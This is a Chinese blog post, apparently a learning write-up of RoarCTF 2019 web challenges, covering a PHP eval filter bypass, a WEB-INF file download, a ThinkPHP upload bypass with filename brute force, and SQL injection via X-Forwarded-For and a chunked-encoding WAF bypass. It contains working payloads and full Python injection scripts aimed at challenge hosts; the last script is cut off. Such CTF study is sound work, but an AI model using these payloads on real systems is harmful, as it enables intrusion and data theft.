<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/HeadPortrait-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/HeadPortrait-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('http://www.xianfish.xyz').hostname,
    root: '/',
    scheme: 'Muse',
    version: '7.7.0',
    exturl: false,
    sidebar: {"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="0x01 Easy Calc页面打开之后，是一个计算表达式的页面  随便输入一个表达式">
<meta name="keywords" content="CTFWEB">
<meta property="og:type" content="article">
<meta property="og:title" content="RoarCTF2019WEB学习">
<meta property="og:url" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/index.html">
<meta property="og:site_name" content="Hi~">
<meta property="og:description" content="0x01 Easy Calc页面打开之后，是一个计算表达式的页面  随便输入一个表达式">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/1.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/2.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/3.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/4.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/5.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/6.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/7.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/8.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/9.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/10.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/11.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/12.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/13.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/14.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/15.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/16.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/17.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/19.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/19.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/20.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/21.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/22.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/23.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/24.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/25.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/26.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/27.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/28.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/29.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/30.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/31.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/32.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/33.png">
<meta property="og:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/2019040111.jpg">
<meta property="og:updated_time" content="2020-01-11T07:48:06.094Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="RoarCTF2019WEB学习">
<meta name="twitter:description" content="0x01 Easy Calc页面打开之后，是一个计算表达式的页面  随便输入一个表达式">
<meta name="twitter:image" content="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/1.png">

<link rel="canonical" href="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>RoarCTF2019WEB学习 | Hi~</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hi~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">人生总有各种理由将一个人变成一个five!</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://www.xianfish.xyz/2019/11/14/RoarCTF2019WEB学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/HeadPortrait.png">
      <meta itemprop="name" content="瑟瑟发抖咸鱼黄">
      <meta itemprop="description" content="您看！工具人啥都不配拥有!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hi~">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          RoarCTF2019WEB学习
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2019-11-14 20:36:27" itemprop="dateCreated datePublished" datetime="2019-11-14T20:36:27+08:00">2019-11-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-01-11 15:48:06" itemprop="dateModified" datetime="2020-01-11T15:48:06+08:00">2020-01-11</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x01-Easy-Calc"><a href="#0x01-Easy-Calc" class="headerlink" title="0x01 Easy Calc"></a>0x01 Easy Calc</h3><p>页面打开之后，是一个计算表达式的页面</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/1.png" alt="1"></p>
<p>随便输入一个表达式</p>
<a id="more"></a>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/2.png" alt="2"></p>
<p>抓包分析，是通过get方式向calc.php发起的请求</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/3.png" alt="3"></p>
<p>直接访问calc.php可以得到源码</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/4.png" alt="4"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'num'</span>]))&#123; </span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>); </span><br><span class="line">&#125;<span class="keyword">else</span>&#123; </span><br><span class="line">        $str = $_GET[<span class="string">'num'</span>]; </span><br><span class="line">        $blacklist = [<span class="string">' '</span>, <span class="string">'\t'</span>, <span class="string">'\r'</span>, <span class="string">'\n'</span>,<span class="string">'\''</span>, <span class="string">'"'</span>, <span class="string">'`'</span>, <span class="string">'\['</span>, <span class="string">'\]'</span>,<span class="string">'\$'</span>,<span class="string">'\\'</span>,<span class="string">'\^'</span>]; <span class="comment">#空格 tab 换行 回车 "  [ ] $ \ ^</span></span><br><span class="line">        <span class="keyword">foreach</span> ($blacklist <span class="keyword">as</span> $blackitem) &#123; </span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">'/'</span> . $blackitem . <span class="string">'/m'</span>, $str)) &#123; </span><br><span class="line">                        <span class="keyword">die</span>(<span class="string">"what are you want to do?"</span>); </span><br><span class="line">                &#125; </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">eval</span>(<span class="string">'echo '</span>.$str.<span class="string">';'</span>); </span><br><span class="line">&#125; </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>发现过滤了一些字符，而且在做题过程中，发现过滤的字符远不止代码里面这些，应该还加了waf，在主界面的前端代码里也看到了提示</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/5.png" alt="5"></p>
<p>因为waf的存在，输入一些字符，会出现403错误，</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/6.png" alt="6"></p>
<p>绕过的方式很简单，只需要nun前面加上个空格就好了，不过要urldecode</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/7.png" alt="7"></p>
<p>接下来就是构造payload获得flag了,针对这里的过滤我们可以直接使用base64编码绕过</p>
<p>Payload1  获取文件列表</p>
<p>编码前: <code>eval(base64_decode(print_r(scandir(&#39;/&#39;));;;))</code></p>
<p>编码后：<code>eval(base64_decode(cHJpbnRfcihzY2FuZGlyKCcvJykpOzs7))</code></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/8.png" alt="8"></p>
<p>Payload2  读取flag</p>
<p>编码前: <code>eval(base64_decode(readfile(&#39;/flagg&#39;);;;))</code></p>
<p>编码后:<code>eval(base64_decode(cmVhZGZpbGUoJy9mMWFnZycpOzs7))</code></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/9.png" alt="9"></p>
<h3 id="0x02-Easy-java"><a href="#0x02-Easy-java" class="headerlink" title="0x02 Easy java"></a>0x02 Easy java</h3><p>页面打开有一个help按钮，点击后应该是一个下载文件，但是出现了错误</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/10.png" alt="10"></p>
<p>抓包将GET改为哦POST后发现下载成功了</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/11.png" alt="11"></p>
<p>根据题目easy java尝试去下载<code>WEB-INF/web.xml</code></p>
<p>Payload1：<code>filename=WEB-INF/web.xml</code></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/12.png" alt="12"></p>
<p>尝试去请求继续请求<code>com.wm.ctf.FlagController</code></p>
<p>Payload2: <code>filename=/WEB-INF/classes/com/wm/ctf/FlagController.class</code></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/13.png" alt="13"></p>
<p>这里得到一个字符串，base64 Decode即可得到flag</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/14.png" alt="14"></p>
<h3 id="0x03-Simple-Upload"><a href="#0x03-Simple-Upload" class="headerlink" title="0x03 Simple Upload"></a>0x03 Simple Upload</h3><p>打开就给了源码，是ThinkPHP框架</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>; </span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>; </span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span> </span></span><br><span class="line"><span class="class"></span>&#123; </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span><span class="params">()</span> </span></span><br><span class="line"><span class="function">    </span>&#123; </span><br><span class="line">        show_source(<span class="keyword">__FILE__</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span><span class="params">()</span> </span></span><br><span class="line"><span class="function">    </span>&#123; </span><br><span class="line">        $uploadFile = $_FILES[<span class="string">'file'</span>] ; </span><br><span class="line">         </span><br><span class="line">        <span class="keyword">if</span> (strstr(strtolower($uploadFile[<span class="string">'name'</span>]), <span class="string">".php"</span>) ) &#123; </span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>; </span><br><span class="line">        &#125; </span><br><span class="line">         </span><br><span class="line">        $upload = <span class="keyword">new</span> \Think\Upload();<span class="comment">// 实例化上传类 </span></span><br><span class="line">        $upload-&gt;maxSize  = <span class="number">4096</span> ;<span class="comment">// 设置附件上传大小 </span></span><br><span class="line">        $upload-&gt;allowExts  = <span class="keyword">array</span>(<span class="string">'jpg'</span>, <span class="string">'gif'</span>, <span class="string">'png'</span>, <span class="string">'jpeg'</span>);<span class="comment">// 设置附件上传类型 </span></span><br><span class="line">        $upload-&gt;rootPath = <span class="string">'./Public/Uploads/'</span>;<span class="comment">// 设置附件上传目录 </span></span><br><span class="line">        $upload-&gt;savePath = <span class="string">''</span>;<span class="comment">// 设置附件上传子目录 </span></span><br><span class="line">        $info = $upload-&gt;upload() ; </span><br><span class="line">        <span class="keyword">if</span>(!$info) &#123;<span class="comment">// 上传错误提示错误信息 </span></span><br><span class="line">          <span class="keyword">$this</span>-&gt;error($upload-&gt;getError()); </span><br><span class="line">          <span class="keyword">return</span>; </span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;<span class="comment">// 上传成功 获取上传文件信息 </span></span><br><span class="line">          $url = __ROOT__.substr($upload-&gt;rootPath,<span class="number">1</span>).$info[<span class="string">'file'</span>][<span class="string">'savepath'</span>].$info[<span class="string">'file'</span>][<span class="string">'savename'</span>] ; </span><br><span class="line">          <span class="keyword">echo</span> json_encode(<span class="keyword">array</span>(<span class="string">"url"</span>=&gt;$url,<span class="string">"success"</span>=&gt;<span class="number">1</span>)); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在代码中进行了一个过滤，检测上传文件是否包含 ‘.php’ 如果包含则返回false</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/15.png" alt="15"></p>
<p>文件的具体上传使用的ThinkPHP的upload类</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/16.png" alt="16"></p>
<p>我们去查看thinkphp的源码，在<code>/Library/Think/Upload.class.php</code>中可以找到上传文件的相关代码 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 对上传文件数组信息处理</span></span><br><span class="line">$files  = <span class="keyword">$this</span>-&gt;dealFiles($files);  </span><br><span class="line"><span class="keyword">foreach</span> ($files <span class="keyword">as</span> $key =&gt; $file) &#123;</span><br><span class="line"> $file[<span class="string">'name'</span>] = strip_tags($file[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>($file[<span class="string">'key'</span>]))  $file[<span class="string">'key'</span>]  =  $key;</span><br><span class="line"><span class="comment">/* 通过扩展获取文件类型，可解决FLASH上传$FILES数组返回文件类型错误的问题 */</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>($finfo))&#123;</span><br><span class="line">   $file[<span class="string">'type'</span>]  =  finfo_file ( $finfo , $file[<span class="string">'tmp_name'</span>] );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在这里有一个strip_tags函数，这个函数会剥去字符串中的HTML、XML、PHP标签，在这里就会去除上传文件名里面的这些字符串，于是我们可以直接构造嵌套文件名的方式上传文件，比如 p</p><p>hp ，但是在这里不知道为什么，这个过滤是无效的，所以可以直接上传php</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/17.png" alt="17"></p>
<p>然后这里文件名曾也会根据uniqid重新生成，我们无法直接得到文件名，但是如果同时上传多个文件，文件名称就会非常相近，所以可以上传几个正常的文件，得到名称后进行爆破，我们先同时上传两个文件，一个是txt文本文件，另外一个是我们的php文件</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/19.png" alt="5"></p>
<p>发送请求后，我们得到了一个文件路径，这个路劲就是我们上传的txt文件的路径，接下来我们便对上传的php文件进行爆破，直接使用bp爆破最后四个字符，这个我试了好多好多好多次，发现其实只用爆破0-9&amp;a-f就可以了</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/19.png" alt="19"></p>
<p>可能是因为题目平台的原因，如果线程开多了，会无法访问，所以我只开了两个线程，最后最后跑出了结果，卑微.jpg</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/20.png" alt="20"></p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/21.png" alt="21"></p>
<h3 id="0x04-Online-Proxy"><a href="#0x04-Online-Proxy" class="headerlink" title="0x04 Online Proxy"></a>0x04 Online Proxy</h3><p>看起来是个SSRF其实是注入的题目，根据提示信息，说会收集使用信息</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/22.png" alt="22"></p>
<p>然而F12查看源码，发现有注释信息，猜测记录的信息可能就是IP地址，向请求中添加<code>X-Forwarded-For</code>就可以修改ip，这里也就是我们的注入点</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/23.png" alt="23"></p>
<p>接下来就开始时间盲注，直接贴上大佬的脚本，学习学习</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">target = <span class="string">"http://node3.buuoj.cn:28008/"</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">execute_sql</span><span class="params">(sql)</span>:</span></span><br><span class="line">    print(<span class="string">"[*]请求语句："</span> + sql)</span><br><span class="line">    return_result = <span class="string">""</span></span><br><span class="line"></span><br><span class="line">    payload = <span class="string">"0'|length(("</span> + sql + <span class="string">"))|'0"</span></span><br><span class="line">    session = requests.session()</span><br><span class="line">    r = session.get(target, headers=&#123;<span class="string">'X-Forwarded-For'</span>: payload&#125;)</span><br><span class="line">    r = session.get(target, headers=&#123;<span class="string">'X-Forwarded-For'</span>: <span class="string">'glzjin'</span>&#125;)</span><br><span class="line">    r = session.get(target, headers=&#123;<span class="string">'X-Forwarded-For'</span>: <span class="string">'glzjin'</span>&#125;)</span><br><span class="line">    start_pos = r.text.find(<span class="string">"Last Ip: "</span>)</span><br><span class="line">    end_pos = r.text.find(<span class="string">" --&gt;"</span>, start_pos)</span><br><span class="line">    length = int(r.text[start_pos + <span class="number">9</span>: end_pos])</span><br><span class="line">    print(<span class="string">"[+]长度："</span> + str(length))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, length + <span class="number">1</span>, <span class="number">5</span>):</span><br><span class="line">        payload = <span class="string">"0'|conv(hex(substr(("</span> + sql + <span class="string">"),"</span> + str(i) + <span class="string">",5)),16,10)|'0"</span></span><br><span class="line"></span><br><span class="line">        r = session.get(target, headers=&#123;<span class="string">'X-Forwarded-For'</span>: payload&#125;) <span class="comment"># 将语句注入</span></span><br><span class="line">        r = session.get(target, headers=&#123;<span class="string">'X-Forwarded-For'</span>: <span class="string">'glzjin'</span>&#125;)    <span class="comment"># 查询上次IP时触发二次注入</span></span><br><span class="line">        r = session.get(target, headers=&#123;<span class="string">'X-Forwarded-For'</span>: <span class="string">'glzjin'</span>&#125;)    <span class="comment"># 再次查询得到结果</span></span><br><span class="line">        start_pos = r.text.find(<span class="string">"Last Ip: "</span>)</span><br><span class="line">        end_pos = r.text.find(<span class="string">" --&gt;"</span>, start_pos)</span><br><span class="line">        result = int(r.text[start_pos + <span class="number">9</span>: end_pos])</span><br><span class="line">        return_result += bytes.fromhex(hex(result)[<span class="number">2</span>:]).decode(<span class="string">'utf-8'</span>)</span><br><span class="line"></span><br><span class="line">        print(<span class="string">"[+]位置 "</span> + str(i) + <span class="string">" 请求五位成功:"</span> + bytes.fromhex(hex(result)[<span class="number">2</span>:]).decode(<span class="string">'utf-8'</span>))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> return_result</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取数据库</span></span><br><span class="line">print(<span class="string">"[+]获取成功："</span> + execute_sql(<span class="string">"SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取数据库表</span></span><br><span class="line">print(<span class="string">"[+]获取成功："</span> + execute_sql(<span class="string">"SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取数据库表</span></span><br><span class="line">print(<span class="string">"[+]获取成功："</span> + execute_sql(<span class="string">"SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取表中内容</span></span><br><span class="line">print(<span class="string">"[+]获取成功："</span> + execute_sql(<span class="string">"SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"</span>))</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/24.png" alt="24"></p>
<h3 id="0x05-Dist"><a href="#0x05-Dist" class="headerlink" title="0x05 Dist"></a>0x05 Dist</h3><p>浏览器设置好代理，打开页面后，F12查看文件，发现前端使用的是vue,是一个前后端分离的架构，并且在source的<code>src/components/config.js</code>中发现了这个应该是备份文件的路径，访问后下载得到源码</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/25.png" alt="26"></p>
<p>拿到源码之后，又是一波代码审计</p>
<p>这是一个赌场游戏的系统，我们可以知道：</p>
<ul>
<li>每一个用户可以获取6次0-99的金额</li>
<li><p>获得flag的条件是用户总金额加上一个大的随机数uint64(0xFFFFFFF+rand.Intn(0xFFFFF)要等于0X1010010c或总金额大于999999</p>
</li>
<li><p>这个系统只有管理员才有权限添加游戏用户，开启赌场游戏和重置赌场游戏</p>
</li>
<li>赌场游戏一轮持续5分钟</li>
</ul>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/26.png" alt="26"></p>
<p>在登录处发现也存在SQLite3注入，但由于网站还加了一层tcp过滤关键字的WAF，这里需要使用HTTP的分块传输机制绕过关键字过滤</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/27.png" alt="27"></p>
<p>在WAF里面，也在TCP层面过滤了关键字，这里可以使用Transfer-Encoding：chunked机制进行绕过</p>
<p><img src="/2019/11/14/RoarCTF2019WEB学习/28.png" alt="28"></p>
<p>贴出大佬的注入脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"> </span><br><span class="line">url = <span class="string">'http://127.0.0.1:9000/auth/login'</span></span><br><span class="line">flag = <span class="string">''</span> </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">32</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="string">'zxcvbnmlkjhgfdsaqwertyuiop0987654321!@#$%^&amp;*()_+'</span>:</span><br><span class="line">        t = <span class="string">f"a' and substr((select secret from secret limit 1),<span class="subst">&#123;i&#125;</span>,1)='<span class="subst">&#123;j&#125;</span>'-- -"</span></span><br><span class="line">        tmp = <span class="string">f'<span class="subst">&#123;&#123;<span class="string">"uname"</span>:<span class="string">"&#123;t&#125;"</span>,<span class="string">"pwd"</span>:<span class="string">"11111111"</span>&#125;</span>&#125;'</span></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">data</span><span class="params">()</span>:</span></span><br><span class="line">            <span class="keyword">for</span> w <span class="keyword">in</span> tmp:</span><br><span class="line">                <span 